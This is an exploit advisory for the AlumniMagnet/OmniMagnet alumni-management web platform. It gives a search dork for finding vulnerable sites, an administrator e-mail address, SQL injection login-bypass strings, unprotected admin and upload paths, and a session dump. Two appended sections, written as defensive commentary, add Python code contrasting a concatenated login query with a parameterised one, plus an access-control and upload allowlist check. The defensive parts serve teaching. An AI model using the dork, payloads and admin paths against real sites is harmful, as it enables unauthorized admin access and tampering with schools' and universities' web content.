####################################################################
# Exploit Title : AlumniMagnet OmniMagnet Improper Access Control Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/05/2019
# Vendor Homepage : alumnimagnet.com ~ support.omnimagnet.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Powered By AlumniMagnet + inurl:/article.html?aid= site:org
# Vulnerability Type : CWE-284 [ Improper Access Control ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
AlumniMagnet is used by leading alumni associations as their alumni engagement and
volunteer management platform. It is built for large universities and colleges, for
schools, and for their chapters. The Enterprise Edition includes all of the Central features
and additionally connects the university's alumni office with all of its associated
chapters, classes, and clubs.
####################################################################
# Impact :
***********
The software does not restrict, or incorrectly restricts, access to a resource from
an unauthorized actor.
There are two distinct behaviors that can introduce access control weaknesses:
Specification: incorrect privileges, permissions, ownership, etc. are explicitly specified for
either the user or the resource (for example, setting a password file to be world-writable, or
giving administrator capabilities to a guest user). This action could be performed by
the program or the administrator. The result is that activities meant to be carried out only
by the administrator or the program become available to all users.
Enforcement: the mechanism contains errors that prevent it from properly enforcing the
specified access control requirements (e.g., allowing the user to specify their own privileges, or
allowing a syntactically incorrect ACL to produce insecure settings). This problem occurs
within the program itself, in that it does not actually enforce the intended security
policy that the administrator specifies.
Potential Mitigations :
*********************
Phases: Architecture and Design; Operation
Very carefully manage the setting, management, and handling of privileges.
Explicitly manage trust zones in the software.
Phase: Architecture and Design
Strategy: Separation of Privilege
Compartmentalize the system to have "safe" areas where trust boundaries can be
unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary
and always be careful when interfacing with a compartment outside of the safe area.
Ensure that appropriate compartmentalization is built into the system design and that
the compartmentalization serves to allow for and further reinforce privilege separation
functionality. Architects and designers should rely on the principle of least privilege
to decide when it is appropriate to use and to drop system privileges.
####################################################################
# Improper Access Control Exploit :
********************************
Non-Alumni Staff Administrator Page Login Path :
*******************************************
/user.html?op=login&non_alum=true
Faculty, Staff, Parents, and Non-Alumni
Members and Guests – click here and login below.
Administrator E-Mail Address :
****************************
ops@omnimagnet.com
'or''='@gmail.com
'or''='@yahoo.com
'or''='@hotmail.com
Administrator Password :
***********************
'or''='
' or 1=1 limit 1 -- -+
anything' OR 'x'='x
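The e-mail and password values listed above only get past the login if the application builds its SQL query by concatenating the submitted fields into the statement. The following added example is mine, not the vendor's code or the author's; the user table, its column names and the stored credential are constructed assumptions. It shows a login written by concatenation next to a hardened version that binds parameters and verifies a salted hash, and runs the page's 'or''=' pair through both:

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt):
    # PBKDF2-HMAC-SHA256; the iteration count is a demo value, tune it for production.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def build_db():
    """Constructed in-memory stand-in for the application's user table.
    The advisory does not disclose the real schema, so these columns are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT, "
        "salt BLOB, pw_hash BLOB, is_staff INTEGER)"
    )
    salt = os.urandom(16)
    # The plaintext 'password' column exists only so the legacy query below can be
    # shown; the hardened login uses the salted hash and never needs it.
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        ("ops@omnimagnet.com", "correct-horse", salt,
         hash_password("correct-horse", salt), 1),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """Query assembled by string concatenation. A quote inside either field ends the
    SQL literal, so the rest of the input is parsed as SQL and the WHERE clause becomes
    attacker-controlled: this is the pattern the 'or''=' payloads above rely on."""
    sql = ("SELECT email, is_staff FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn, email, password):
    """Hardened login: the e-mail travels as a bound parameter (quotes stay data),
    the password is never placed in SQL at all, and the salted hash is compared
    in constant time. Returns (email, is_staff) on success, None otherwise."""
    row = conn.execute(
        "SELECT salt, pw_hash, is_staff FROM users WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return None
    salt, stored_hash, is_staff = row
    if not hmac.compare_digest(hash_password(password, salt), stored_hash):
        return None
    return (email, bool(is_staff))


if __name__ == "__main__":
    db = build_db()
    payload_email, payload_pw = "'or''='@gmail.com", "'or''='"
    print("concatenated query:", login_vulnerable(db, payload_email, payload_pw))  # returns a row
    print("parameterised query:", login_safe(db, payload_email, payload_pw))       # returns None
    print("real credentials:", login_safe(db, "ops@omnimagnet.com", "correct-horse"))
```

With the concatenated query the submitted quotes turn the WHERE clause into `email = '' or '' = '@gmail.com' AND password = '' or '' = ''`, whose final `'' = ''` is always true, so the first row comes back without any valid credential. The bound-parameter version sends the same bytes as data, finds no such e-mail, and returns None; a wrong password for a real account is rejected by the constant-time hash comparison rather than by a string match in SQL.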
Useable Admin Control Panel Links :
********************************
We can change the articles on the homepage
without administrator permission.
/admin_article.html
/article.html?aid=[ID-NUMBER]
/admin_article.html?op=edit&aid=[ID-NUMBER]
/admin_files.html
/admin_files.html?sub_op=upload_files
Allowed files: jpg, png, gif, pdf, psd, eps, xls, xlsx, doc, docx, csv, txt, p12
Upload a file, then click Manage Uploads.
At the bottom of the page a link shows where the uploaded image is stored:
/images/vault/[ID-NUMBER].jpg
Look at the File Destination entry ('file_dest') in the session dump:
array (
  'captcha' =>
  array (
    0 => '[RANDOM-ID-NUMBER]',
  ),
  'current_user' => '1',
  'current_user_first_name' => 'Magnet',
  'current_user_aux_id' => '',
  'current_user_permissions' => '[RANDOM-ID-NUMBER]',
  'current_user_email' => 'ops@omnimagnet.com',
  'current_user_nickname' => 'Magnet Team',
  'signed_in_at' => '[DOMAIN-ADDRESS-HERE]',
  'main_code' => NULL,
  'last_update_date' => '[RANDOM-ID-NUMBER]',
  'current_user_authenticated' => 'y',
  'last_action_requested' => '[DOMAIN-ADDRESS-HERE]/admin_files.html?sub_op=upload_files',
  'file_dest' => 'images/vault/[ID-NUMBER].jpg',
)
Sometimes the site returns an error like the one below; in that case an admin
account cannot be obtained:
************************************
Access denied...
The page you requested requires staff clearance.
Make sure you are logged into the system before you proceed.
If you feel that this is an error, please contact an admin.
Authentication Error
Error code 201
The email/password combination you have entered does not match.
Please check your records and try again.
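Both findings above (admin pages reachable without staff clearance, and uploads landing under images/vault/) come down to checks that must be made on the server for every request. The following added example is not the vendor's code or the author's: it is a deny-by-default authorization check keyed on the session fields seen in the dump above, with roles taken from a constructed server-side table rather than from anything the client can send, plus an upload check that keeps only an allowlisted extension from the client's file name and lets the server choose the storage path. The route pattern, the role table and the user ids are assumptions; the extension allowlist is the one listed on the page.

```python
import re

# Constructed policy: the admin pages listed in the advisory, mapped to the
# clearance they should require. The vendor's real routing is not known.
STAFF_ONLY_PATH = re.compile(r"^/admin_[a-z_]+\.html$")

# Constructed server-side authority: user id -> roles. Roles are looked up
# here, never read from the client-visible session blob or request parameters,
# so a client cannot "specify their own privileges" (CWE-284 enforcement case).
USER_ROLES = {
    "1": {"staff"},   # assumption: the 'Magnet Team' operator account
    "2": set(),       # assumption: an ordinary alumni account
}

# File types the upload page accepts, as listed on the page.
ALLOWED_UPLOAD_EXT = {"jpg", "png", "gif", "pdf", "psd", "eps", "xls", "xlsx",
                      "doc", "docx", "csv", "txt", "p12"}

# Same wording the application itself uses when clearance is missing.
ACCESS_DENIED = ("Access denied... The page you requested requires staff clearance. "
                 "Make sure you are logged into the system before you proceed.")


def requires_staff(path):
    """True for /admin_*.html regardless of the query string (op=edit, sub_op=...)."""
    return STAFF_ONLY_PATH.match(path.split("?", 1)[0]) is not None


def authorize(session, path):
    """Deny-by-default check to run before any admin handler.
    Returns (allowed, message); message is empty when access is granted."""
    if not requires_staff(path):
        return True, ""
    if session.get("current_user_authenticated") != "y":
        return False, ACCESS_DENIED
    roles = USER_ROLES.get(session.get("current_user"), set())
    if "staff" not in roles:
        return False, ACCESS_DENIED
    return True, ""


def upload_destination(filename, file_id):
    """Server-chosen storage path images/vault/<id>.<ext>, mirroring the page's
    'file_dest'. Only the extension survives from the client's file name, and
    only if it is allowlisted; otherwise the upload is refused (None)."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        return None
    return "images/vault/%d.%s" % (int(file_id), ext)


if __name__ == "__main__":
    guest = {}
    alumni = {"current_user_authenticated": "y", "current_user": "2"}
    staff = {"current_user_authenticated": "y", "current_user": "1"}
    for who, sess in (("guest", guest), ("alumni", alumni), ("staff", staff)):
        print(who, authorize(sess, "/admin_article.html?op=edit&aid=42"))
    print(upload_destination("photo.JPG", 1234))   # images/vault/1234.jpg
    print(upload_destination("notes.exe", 1234))   # None
```

The check is applied to the path before the query string, so `/admin_article.html?op=edit&aid=...` and `/admin_files.html?sub_op=upload_files` are covered by the same rule, and a session that carries a `current_user_permissions` value of the client's choosing still gets the "requires staff clearance" response unless the server-side role table says otherwise.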
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################